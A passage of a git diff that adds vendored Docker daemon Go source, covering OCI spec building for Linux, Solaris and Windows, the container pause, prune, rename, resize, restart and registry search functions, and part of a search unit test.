specs.Hooks{ + Prestart: []specs.Hook{{ + Path: target, // FIXME: cross-platform + Args: []string{"libnetwork-setkey", c.ID, daemon.netController.ID()}, + }}, + } + } + } + + if apparmor.IsEnabled() { + var appArmorProfile string + if c.AppArmorProfile != "" { + appArmorProfile = c.AppArmorProfile + } else if c.HostConfig.Privileged { + appArmorProfile = "unconfined" + } else { + appArmorProfile = "docker-default" + } + + if appArmorProfile == "docker-default" { + // Unattended upgrades and other fun services can unload AppArmor + // profiles inadvertently. Since we cannot store our profile in + // /etc/apparmor.d, nor can we practically add other ways of + // telling the system to keep our profile loaded, in order to make + // sure that we keep the default profile enabled we dynamically + // reload it if necessary. + if err := ensureDefaultAppArmorProfile(); err != nil { + return nil, err + } + } + + s.Process.ApparmorProfile = appArmorProfile + } + s.Process.SelinuxLabel = c.GetProcessLabel() + s.Process.NoNewPrivileges = c.NoNewPrivileges + s.Linux.MountLabel = c.MountLabel + + return (*specs.Spec)(&s), nil +} + +func clearReadOnly(m *specs.Mount) { + var opt []string + for _, o := range m.Options { + if o != "ro" { + opt = append(opt, o) + } + } + m.Options = opt +} + +// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig +func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { + ulimits := c.Ulimits + // Merge ulimits with daemon defaults + ulIdx := make(map[string]struct{}) + for _, ul := range ulimits { + ulIdx[ul.Name] = struct{}{} + } + for name, ul := range daemon.configStore.Ulimits { + if _, exists := ulIdx[name]; !exists { + ulimits = append(ulimits, ul) + } + } + c.Ulimits = ulimits +} diff --git a/vendor/github.com/docker/docker/daemon/oci_solaris.go b/vendor/github.com/docker/docker/daemon/oci_solaris.go new file mode 100644 index 0000000000..0c757f9196 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_solaris.go @@ -0,0 +1,188 @@ +package daemon + +import ( + "fmt" + "path/filepath" + "sort" + "strconv" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/oci" + "github.com/docker/libnetwork" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func setResources(s *specs.Spec, r containertypes.Resources) error { + mem := getMemoryResources(r) + s.Solaris.CappedMemory = &mem + + capCPU := getCPUResources(r) + s.Solaris.CappedCPU = &capCPU + + return nil +} + +func setUser(s *specs.Spec, c *container.Container) error { + uid, gid, additionalGids, err := getUser(c, c.Config.User) + if err != nil { + return err + } + s.Process.User.UID = uid + s.Process.User.GID = gid + s.Process.User.AdditionalGids = additionalGids + return nil +} + +func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) { + return 0, 0, nil, nil +} + +func (daemon *Daemon) getRunzAnet(ep libnetwork.Endpoint) (specs.Anet, error) { + var ( + linkName string + lowerLink string + defRouter string + ) + + epInfo := ep.Info() + if epInfo == nil { + return specs.Anet{}, fmt.Errorf("invalid endpoint") + } + + nw, err := daemon.GetNetworkByName(ep.Network()) + if err != nil { + return specs.Anet{}, fmt.Errorf("Failed to get network %s: %v", ep.Network(), err) + } + + // Evaluate default router, linkname and lowerlink for interface endpoint + switch nw.Type() { + case "bridge": + defRouter = epInfo.Gateway().String() + linkName = "net0" // Should always be net0 for a container + + // TODO We construct lowerlink here exactly as done for solaris bridge + // initialization. Need modular code to reuse. + options := nw.Info().DriverOptions() + nwName := options["com.docker.network.bridge.name"] + lastChar := nwName[len(nwName)-1:] + if _, err = strconv.Atoi(lastChar); err != nil { + lowerLink = nwName + "_0" + } else { + lowerLink = nwName + } + + case "overlay": + defRouter = "" + linkName = "net1" + + // TODO Follows generateVxlanName() in solaris overlay. + id := nw.ID() + if len(nw.ID()) > 12 { + id = nw.ID()[:12] + } + lowerLink = "vx_" + id + "_0" + } + + runzanet := specs.Anet{ + Linkname: linkName, + Lowerlink: lowerLink, + Allowedaddr: epInfo.Iface().Address().String(), + Configallowedaddr: "true", + Defrouter: defRouter, + Linkprotection: "mac-nospoof, ip-nospoof", + Macaddress: epInfo.Iface().MacAddress().String(), + } + + return runzanet, nil +} + +func (daemon *Daemon) setNetworkInterface(s *specs.Spec, c *container.Container) error { + var anets []specs.Anet + + sb, err := daemon.netController.SandboxByID(c.NetworkSettings.SandboxID) + if err != nil { + return fmt.Errorf("Could not obtain sandbox for container") + } + + // Populate interfaces required for each endpoint + for _, ep := range sb.Endpoints() { + runzanet, err := daemon.getRunzAnet(ep) + if err != nil { + return fmt.Errorf("Failed to get interface information for endpoint %d: %v", ep.ID(), err) + } + anets = append(anets, runzanet) + } + + s.Solaris.Anet = anets + if anets != nil { + s.Solaris.Milestone = "svc:/milestone/container:default" + } + return nil +} + +func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error { + linkedEnv, err := daemon.setupLinkedContainers(c) + if err != nil { + return err + } + s.Root = specs.Root{ + Path: filepath.Dir(c.BaseFS), + Readonly: c.HostConfig.ReadonlyRootfs, + } + rootUID, rootGID := daemon.GetRemappedUIDGID() + if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { + return err + } + cwd := c.Config.WorkingDir + s.Process.Args = append([]string{c.Path}, c.Args...) + s.Process.Cwd = cwd + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + s.Process.Terminal = c.Config.Tty + s.Hostname = c.FullHostname() + + return nil +} + +func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { + s := oci.DefaultSpec() + if err := daemon.populateCommonSpec(&s, c); err != nil { + return nil, err + } + + if err := setResources(&s, c.HostConfig.Resources); err != nil { + return nil, fmt.Errorf("runtime spec resources: %v", err) + } + + if err := setUser(&s, c); err != nil { + return nil, fmt.Errorf("spec user: %v", err) + } + + if err := daemon.setNetworkInterface(&s, c); err != nil { + return nil, err + } + + if err := daemon.setupIpcDirs(c); err != nil { + return nil, err + } + + ms, err := daemon.setupMounts(c) + if err != nil { + return nil, err + } + ms = append(ms, c.IpcMounts()...) + tmpfsMounts, err := c.TmpfsMounts() + if err != nil { + return nil, err + } + ms = append(ms, tmpfsMounts...) + sort.Sort(mounts(ms)) + + return (*specs.Spec)(&s), nil +} + +// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig +// It will do nothing on non-Linux platform +func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/oci_windows.go b/vendor/github.com/docker/docker/daemon/oci_windows.go new file mode 100644 index 0000000000..6e264243b4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_windows.go @@ -0,0 +1,122 @@ +package daemon + +import ( + "syscall" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/sysinfo" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { + s := oci.DefaultSpec() + + linkedEnv, err := daemon.setupLinkedContainers(c) + if err != nil { + return nil, err + } + + // Note, unlike Unix, we do NOT call into SetupWorkingDirectory as + // this is done in VMCompute. Further, we couldn't do it for Hyper-V + // containers anyway. + + // In base spec + s.Hostname = c.FullHostname() + + // In s.Mounts + mounts, err := daemon.setupMounts(c) + if err != nil { + return nil, err + } + for _, mount := range mounts { + m := specs.Mount{ + Source: mount.Source, + Destination: mount.Destination, + } + if !mount.Writable { + m.Options = append(m.Options, "ro") + } + s.Mounts = append(s.Mounts, m) + } + + // In s.Process + s.Process.Args = append([]string{c.Path}, c.Args...) + if !c.Config.ArgsEscaped { + s.Process.Args = escapeArgs(s.Process.Args) + } + s.Process.Cwd = c.Config.WorkingDir + if len(s.Process.Cwd) == 0 { + // We default to C:\ to workaround the oddity of the case that the + // default directory for cmd running as LocalSystem (or + // ContainerAdministrator) is c:\windows\system32. Hence docker run + // cmd will by default end in c:\windows\system32, rather + // than 'root' (/) on Linux. The oddity is that if you have a dockerfile + // which has no WORKDIR and has a COPY file ., . will be interpreted + // as c:\. Hence, setting it to default of c:\ makes for consistency. + s.Process.Cwd = `C:\` + } + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + s.Process.ConsoleSize.Height = c.HostConfig.ConsoleSize[0] + s.Process.ConsoleSize.Width = c.HostConfig.ConsoleSize[1] + s.Process.Terminal = c.Config.Tty + s.Process.User.Username = c.Config.User + + // In spec.Root. This is not set for Hyper-V containers + isHyperV := false + if c.HostConfig.Isolation.IsDefault() { + // Container using default isolation, so take the default from the daemon configuration + isHyperV = daemon.defaultIsolation.IsHyperV() + } else { + // Container may be requesting an explicit isolation mode. + isHyperV = c.HostConfig.Isolation.IsHyperV() + } + if !isHyperV { + s.Root.Path = c.BaseFS + } + s.Root.Readonly = false // Windows does not support a read-only root filesystem + + // In s.Windows.Resources + // @darrenstahlmsft implement these resources + cpuShares := uint16(c.HostConfig.CPUShares) + cpuPercent := uint8(c.HostConfig.CPUPercent) + if c.HostConfig.NanoCPUs > 0 { + cpuPercent = uint8(c.HostConfig.NanoCPUs * 100 / int64(sysinfo.NumCPU()) / 1e9) + } + cpuCount := uint64(c.HostConfig.CPUCount) + memoryLimit := uint64(c.HostConfig.Memory) + s.Windows.Resources = &specs.WindowsResources{ + CPU: &specs.WindowsCPUResources{ + Percent: &cpuPercent, + Shares: &cpuShares, + Count: &cpuCount, + }, + Memory: &specs.WindowsMemoryResources{ + Limit: &memoryLimit, + //TODO Reservation: ..., + }, + Network: &specs.WindowsNetworkResources{ + //TODO Bandwidth: ..., + }, + Storage: &specs.WindowsStorageResources{ + Bps: &c.HostConfig.IOMaximumBandwidth, + Iops: &c.HostConfig.IOMaximumIOps, + }, + } + return (*specs.Spec)(&s), nil +} + +func escapeArgs(args []string) []string { + escapedArgs := make([]string, len(args)) + for i, a := range args { + escapedArgs[i] = syscall.EscapeArg(a) + } + return escapedArgs +} + +// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig +// It will do nothing on non-Linux platform +func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/pause.go b/vendor/github.com/docker/docker/daemon/pause.go new file mode 100644 index 0000000000..dbfafbc5fd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/pause.go @@ -0,0 +1,49 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" +) + +// ContainerPause pauses a container +func (daemon *Daemon) ContainerPause(name string) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if err := daemon.containerPause(container); err != nil { + return err + } + + return nil +} + +// containerPause pauses the container execution without stopping the process. +// The execution can be resumed by calling containerUnpause. +func (daemon *Daemon) containerPause(container *container.Container) error { + container.Lock() + defer container.Unlock() + + // We cannot Pause the container which is not running + if !container.Running { + return errNotRunning{container.ID} + } + + // We cannot Pause the container which is already paused + if container.Paused { + return fmt.Errorf("Container %s is already paused", container.ID) + } + + // We cannot Pause the container which is restarting + if container.Restarting { + return errContainerIsRestarting(container.ID) + } + + if err := daemon.containerd.Pause(container.ID); err != nil { + return fmt.Errorf("Cannot pause container %s: %s", container.ID, err) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/prune.go b/vendor/github.com/docker/docker/daemon/prune.go new file mode 100644 index 0000000000..a693beb4e1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/prune.go @@ -0,0 +1,236 @@ +package daemon + +import ( + "fmt" + "regexp" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/reference" + "github.com/docker/docker/runconfig" + "github.com/docker/docker/volume" + "github.com/docker/libnetwork" +) + +// ContainersPrune removes unused containers +func (daemon *Daemon) ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) { + rep := &types.ContainersPruneReport{} + + allContainers := daemon.List() + for _, c := range allContainers { + if !c.IsRunning() { + cSize, _ := daemon.getSize(c) + // TODO: sets RmLink to true? + err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{}) + if err != nil { + logrus.Warnf("failed to prune container %s: %v", c.ID, err) + continue + } + if cSize > 0 { + rep.SpaceReclaimed += uint64(cSize) + } + rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID) + } + } + + return rep, nil +} + +// VolumesPrune removes unused local volumes +func (daemon *Daemon) VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) { + rep := &types.VolumesPruneReport{} + + pruneVols := func(v volume.Volume) error { + name := v.Name() + refs := daemon.volumes.Refs(v) + + if len(refs) == 0 { + vSize, err := directory.Size(v.Path()) + if err != nil { + logrus.Warnf("could not determine size of volume %s: %v", name, err) + } + err = daemon.volumes.Remove(v) + if err != nil { + logrus.Warnf("could not remove volume %s: %v", name, err) + return nil + } + rep.SpaceReclaimed += uint64(vSize) + rep.VolumesDeleted = append(rep.VolumesDeleted, name) + } + + return nil + } + + err := daemon.traverseLocalVolumes(pruneVols) + + return rep, err +} + +// ImagesPrune removes unused images +func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) { + rep := &types.ImagesPruneReport{} + + danglingOnly := true + if pruneFilters.Include("dangling") { + if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") { + danglingOnly = false + } else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") { + return nil, fmt.Errorf("Invalid filter 'dangling=%s'", pruneFilters.Get("dangling")) + } + } + + var allImages map[image.ID]*image.Image + if danglingOnly { + allImages = daemon.imageStore.Heads() + } else { + allImages = daemon.imageStore.Map() + } + allContainers := daemon.List() + imageRefs := map[string]bool{} + for _, c := range allContainers { + imageRefs[c.ID] = true + } + + // Filter intermediary images and get their unique size + allLayers := daemon.layerStore.Map() + topImages := map[image.ID]*image.Image{} + for id, img := range allImages { + dgst := digest.Digest(id) + if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { + continue + } + topImages[id] = img + } + + for id := range topImages { + dgst := digest.Digest(id) + hex := dgst.Hex() + if _, ok := imageRefs[hex]; ok { + continue + } + + deletedImages := []types.ImageDelete{} + refs := daemon.referenceStore.References(dgst) + if len(refs) > 0 { + if danglingOnly { + // Not a dangling image + continue + } + + nrRefs := len(refs) + for _, ref := range refs { + // If nrRefs == 1, we have an image marked as myreponame: + // i.e. the tag content was changed + if _, ok := ref.(reference.Canonical); ok && nrRefs > 1 { + continue + } + imgDel, err := daemon.ImageDelete(ref.String(), false, true) + if err != nil { + logrus.Warnf("could not delete reference %s: %v", ref.String(), err) + continue + } + deletedImages = append(deletedImages, imgDel...) + } + } else { + imgDel, err := daemon.ImageDelete(hex, false, true) + if err != nil { + logrus.Warnf("could not delete image %s: %v", hex, err) + continue + } + deletedImages = append(deletedImages, imgDel...) + } + + rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...) + } + + // Compute how much space was freed + for _, d := range rep.ImagesDeleted { + if d.Deleted != "" { + chid := layer.ChainID(d.Deleted) + if l, ok := allLayers[chid]; ok { + diffSize, err := l.DiffSize() + if err != nil { + logrus.Warnf("failed to get layer %s size: %v", chid, err) + continue + } + rep.SpaceReclaimed += uint64(diffSize) + } + } + } + + return rep, nil +} + +// localNetworksPrune removes unused local networks +func (daemon *Daemon) localNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + rep := &types.NetworksPruneReport{} + var err error + // When the function returns true, the walk will stop. + l := func(nw libnetwork.Network) bool { + nwName := nw.Name() + predefined := runconfig.IsPreDefinedNetwork(nwName) + if !predefined && len(nw.Endpoints()) == 0 { + if err = daemon.DeleteNetwork(nw.ID()); err != nil { + logrus.Warnf("could not remove network %s: %v", nwName, err) + return false + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nwName) + } + return false + } + daemon.netController.WalkNetworks(l) + return rep, err +} + +// clusterNetworksPrune removes unused cluster networks +func (daemon *Daemon) clusterNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + rep := &types.NetworksPruneReport{} + cluster := daemon.GetCluster() + networks, err := cluster.GetNetworks() + if err != nil { + return rep, err + } + networkIsInUse := regexp.MustCompile(`network ([[:alnum:]]+) is in use`) + for _, nw := range networks { + if nw.Name == "ingress" { + continue + } + // https://github.com/docker/docker/issues/24186 + // `docker network inspect` unfortunately displays ONLY those containers that are local to that node. + // So we try to remove it anyway and check the error + err = cluster.RemoveNetwork(nw.ID) + if err != nil { + // we can safely ignore the "network .. is in use" error + match := networkIsInUse.FindStringSubmatch(err.Error()) + if len(match) != 2 || match[1] != nw.ID { + logrus.Warnf("could not remove network %s: %v", nw.Name, err) + } + continue + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name) + } + return rep, nil +} + +// NetworksPrune removes unused networks +func (daemon *Daemon) NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + rep := &types.NetworksPruneReport{} + clusterRep, err := daemon.clusterNetworksPrune(pruneFilters) + if err != nil { + logrus.Warnf("could not remove cluster networks: %v", err) + } else { + rep.NetworksDeleted = append(rep.NetworksDeleted, clusterRep.NetworksDeleted...) + } + localRep, err := daemon.localNetworksPrune(pruneFilters) + if err != nil { + logrus.Warnf("could not remove local networks: %v", err) + } else { + rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...) + } + return rep, err +} diff --git a/vendor/github.com/docker/docker/daemon/rename.go b/vendor/github.com/docker/docker/daemon/rename.go new file mode 100644 index 0000000000..ffb7715f23 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/rename.go @@ -0,0 +1,122 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + dockercontainer "github.com/docker/docker/container" + "github.com/docker/libnetwork" +) + +// ContainerRename changes the name of a container, using the oldName +// to find the container. An error is returned if newName is already +// reserved. +func (daemon *Daemon) ContainerRename(oldName, newName string) error { + var ( + sid string + sb libnetwork.Sandbox + ) + + if oldName == "" || newName == "" { + return fmt.Errorf("Neither old nor new names may be empty") + } + + if newName[0] != '/' { + newName = "/" + newName + } + + container, err := daemon.GetContainer(oldName) + if err != nil { + return err + } + + oldName = container.Name + oldIsAnonymousEndpoint := container.NetworkSettings.IsAnonymousEndpoint + + if oldName == newName { + return fmt.Errorf("Renaming a container with the same name as its current name") + } + + container.Lock() + defer container.Unlock() + + links := map[string]*dockercontainer.Container{} + for k, v := range daemon.linkIndex.children(container) { + if !strings.HasPrefix(k, oldName) { + return fmt.Errorf("Linked container %s does not match parent %s", k, oldName) + } + links[strings.TrimPrefix(k, oldName)] = v + } + + if newName, err = daemon.reserveName(container.ID, newName); err != nil { + return fmt.Errorf("Error when allocating new name: %v", err) + } + + for k, v := range links { + daemon.nameIndex.Reserve(newName+k, v.ID) + daemon.linkIndex.link(container, v, newName+k) + } + + container.Name = newName + container.NetworkSettings.IsAnonymousEndpoint = false + + defer func() { + if err != nil { + container.Name = oldName + container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint + daemon.reserveName(container.ID, oldName) + for k, v := range links { + daemon.nameIndex.Reserve(oldName+k, v.ID) + daemon.linkIndex.link(container, v, oldName+k) + daemon.linkIndex.unlink(newName+k, v, container) + daemon.nameIndex.Release(newName + k) + } + daemon.releaseName(newName) + } + }() + + for k, v := range links { + daemon.linkIndex.unlink(oldName+k, v, container) + daemon.nameIndex.Release(oldName + k) + } + daemon.releaseName(oldName) + if err = container.ToDisk(); err != nil { + return err + } + + attributes := map[string]string{ + "oldName": oldName, + } + + if !container.Running { + daemon.LogContainerEventWithAttributes(container, "rename", attributes) + return nil + } + + defer func() { + if err != nil { + container.Name = oldName + container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint + if e := container.ToDisk(); e != nil { + logrus.Errorf("%s: Failed in writing to Disk on rename failure: %v", container.ID, e) + } + } + }() + + sid = container.NetworkSettings.SandboxID + if daemon.netController != nil { + sb, err = daemon.netController.SandboxByID(sid) + if err != nil { + return err + } + + err = sb.Rename(strings.TrimPrefix(container.Name, "/")) + if err != nil { + return err + } + } + + daemon.LogContainerEventWithAttributes(container, "rename", attributes) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/resize.go b/vendor/github.com/docker/docker/daemon/resize.go new file mode 100644 index 0000000000..747353852e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/resize.go @@ -0,0 +1,40 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/libcontainerd" +) + +// ContainerResize changes the size of the TTY of the process running +// in the container with the given name to the given height and width. +func (daemon *Daemon) ContainerResize(name string, height, width int) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if !container.IsRunning() { + return errNotRunning{container.ID} + } + + if err = daemon.containerd.Resize(container.ID, libcontainerd.InitFriendlyName, width, height); err == nil { + attributes := map[string]string{ + "height": fmt.Sprintf("%d", height), + "width": fmt.Sprintf("%d", width), + } + daemon.LogContainerEventWithAttributes(container, "resize", attributes) + } + return err +} + +// ContainerExecResize changes the size of the TTY of the process +// running in the exec with the given name to the given height and +// width. +func (daemon *Daemon) ContainerExecResize(name string, height, width int) error { + ec, err := daemon.getExecConfig(name) + if err != nil { + return err + } + return daemon.containerd.Resize(ec.ContainerID, ec.ID, width, height) +} diff --git a/vendor/github.com/docker/docker/daemon/restart.go b/vendor/github.com/docker/docker/daemon/restart.go new file mode 100644 index 0000000000..79292f3752 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/restart.go @@ -0,0 +1,70 @@ +package daemon + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" +) + +// ContainerRestart stops and starts a container. It attempts to +// gracefully stop the container within the given timeout, forcefully +// stopping it if the timeout is exceeded. If given a negative +// timeout, ContainerRestart will wait forever until a graceful +// stop. Returns an error if the container cannot be found, or if +// there is an underlying error at any stage of the restart. +func (daemon *Daemon) ContainerRestart(name string, seconds *int) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + if seconds == nil { + stopTimeout := container.StopTimeout() + seconds = &stopTimeout + } + if err := daemon.containerRestart(container, *seconds); err != nil { + return fmt.Errorf("Cannot restart container %s: %v", name, err) + } + return nil + +} + +// containerRestart attempts to gracefully stop and then start the +// container. When stopping, wait for the given duration in seconds to +// gracefully stop, before forcefully terminating the container. If +// given a negative duration, wait forever for a graceful stop. +func (daemon *Daemon) containerRestart(container *container.Container, seconds int) error { + // Avoid unnecessarily unmounting and then directly mounting + // the container when the container stops and then starts + // again + if err := daemon.Mount(container); err == nil { + defer daemon.Unmount(container) + } + + if container.IsRunning() { + // set AutoRemove flag to false before stop so the container won't be + // removed during restart process + autoRemove := container.HostConfig.AutoRemove + + container.HostConfig.AutoRemove = false + err := daemon.containerStop(container, seconds) + // restore AutoRemove irrespective of whether the stop worked or not + container.HostConfig.AutoRemove = autoRemove + // containerStop will write HostConfig to disk, we shall restore AutoRemove + // in disk too + if toDiskErr := container.ToDiskLocking(); toDiskErr != nil { + logrus.Errorf("Write container to disk error: %v", toDiskErr) + } + + if err != nil { + return err + } + } + + if err := daemon.containerStart(container, "", "", true); err != nil { + return err + } + + daemon.LogContainerEvent(container, "restart") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/search.go b/vendor/github.com/docker/docker/daemon/search.go new file mode 100644 index 0000000000..5d2ac5d222 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/search.go @@ -0,0 +1,94 @@ +package daemon + +import ( + "fmt" + "strconv" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/dockerversion" +) + +var acceptedSearchFilterTags = map[string]bool{ + "is-automated": true, + "is-official": true, + "stars": true, +} + +// SearchRegistryForImages queries the registry for images matching +// term. authConfig is used to login. +func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, + authConfig *types.AuthConfig, + headers map[string][]string) (*registrytypes.SearchResults, error) { + + searchFilters, err := filters.FromParam(filtersArgs) + if err != nil { + return nil, err + } + if err := searchFilters.Validate(acceptedSearchFilterTags); err != nil { + return nil, err + } + + var isAutomated, isOfficial bool + var hasStarFilter = 0 + if searchFilters.Include("is-automated") { + if searchFilters.UniqueExactMatch("is-automated", "true") { + isAutomated = true + } else if !searchFilters.UniqueExactMatch("is-automated", "false") { + return nil, fmt.Errorf("Invalid filter 'is-automated=%s'", searchFilters.Get("is-automated")) + } + } + if searchFilters.Include("is-official") { + if searchFilters.UniqueExactMatch("is-official", "true") { + isOfficial = true + } else if !searchFilters.UniqueExactMatch("is-official", "false") { + return nil, fmt.Errorf("Invalid filter 'is-official=%s'", searchFilters.Get("is-official")) + } + } + if searchFilters.Include("stars") { + hasStars := searchFilters.Get("stars") + for _, hasStar := range hasStars { + iHasStar, err := strconv.Atoi(hasStar) + if err != nil { + return nil, fmt.Errorf("Invalid filter 'stars=%s'", hasStar) + } + if iHasStar > hasStarFilter { + hasStarFilter = iHasStar + } + } + } + + unfilteredResult, err := daemon.RegistryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers) + if err != nil { + return nil, err + } + + filteredResults := []registrytypes.SearchResult{} + for _, result := range unfilteredResult.Results { + if searchFilters.Include("is-automated") { + if isAutomated != result.IsAutomated { + continue + } + } + if searchFilters.Include("is-official") { + if isOfficial != result.IsOfficial { + continue + } + } + if searchFilters.Include("stars") { + if result.StarCount < hasStarFilter { + continue + } + } + filteredResults = append(filteredResults, result) + } + + return ®istrytypes.SearchResults{ + Query: unfilteredResult.Query, + NumResults: len(filteredResults), + Results: filteredResults, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/search_test.go b/vendor/github.com/docker/docker/daemon/search_test.go new file mode 100644 index 0000000000..f5aa85a61e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/search_test.go @@ -0,0 +1,358 @@ +package daemon + +import ( + "fmt" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/registry" +) + +type FakeService struct { + registry.DefaultService + + shouldReturnError bool + + term string + results []registrytypes.SearchResult +} + +func (s *FakeService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) { + if s.shouldReturnError { + return nil, fmt.Errorf("Search unknown error") + } + return ®istrytypes.SearchResults{ + Query: s.term, + NumResults: len(s.results), + Results: s.results, + }, nil +} + +func TestSearchRegistryForImagesErrors(t *testing.T) { + errorCases := []struct { + filtersArgs string + shouldReturnError bool + expectedError string + }{ + { + expectedError: "Search unknown error", + shouldReturnError: true, + }, + { + filtersArgs: "invalid json", + expectedError: "invalid character 'i' looking for beginning of value", + }, + { + filtersArgs: `{"type":{"custom":true}}`, + expectedError: "Invalid filter 'type'", + }, + { + filtersArgs: `{"is-automated":{"invalid":true}}`, + expectedError: "Invalid filter 'is-automated=[invalid]'", + }, + { + filtersArgs: `{"is-automated":{"true":true,"false":true}}`, + expectedError: "Invalid filter 'is-automated", + }, + { + filtersArgs: `{"is-official":{"invalid":true}}`, + expectedError: "Invalid filter 'is-official=[invalid]'", + }, + { + filtersArgs: `{"is-official":{"true":true,"false":true}}`, + expectedError: "Invalid filter 'is-official", + }, + { + filtersArgs: `{"stars":{"invalid":true}}`, + expectedError: "Invalid filter 'stars=invalid'", + }, + { + filtersArgs: `{"stars":{"1":true,"invalid":true}}`, + expectedError: "Invalid filter 'stars=invalid'", + }, + } + for index, e := range errorCases { + daemon := &Daemon{ + RegistryService: &FakeService{ + shouldReturnError: e.shouldReturnError, + }, + } + _, err := daemon.SearchRegistryForImages(context.Background(), e.filtersArgs, "term", 25, nil, map[string][]string{}) + if err == nil { + t.Errorf("%d: expected an error, got nothing", index) + } + if !strings.Contains(err.Error(), e.expectedError) { + t.Errorf("%d: expected error to contain %s, got %s", index, e.expectedError, err.Error()) + } + } +} + +func TestSearchRegistryForImages(t *testing.T) { + term := "term" + successCases := []struct { + filtersArgs string + registryResults []registrytypes.SearchResult + expectedResults []registrytypes.SearchResult + }{ + { + filtersArgs: "", + registryResults: []registrytypes.SearchResult{}, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: "", + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + }, + }, + }, + { + filtersArgs: `{"is-automated":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"is-automated":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: true, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: true, + }, + }, + }, + { + filtersArgs: `{"is-automated":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: true, + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + filtersArgs: `{"is-automated":{"false":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: false, + }, + }, + expectedResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + IsAutomated: false, + }, + }, + }, + { + filtersArgs: `{"is-official":{"true":true}}`, + registryResults: []registrytypes.SearchResult{ + { + Name: "name", + Description: "description", + }, + }, + expectedResults: []registrytypes.SearchResult{}, + }, + { + 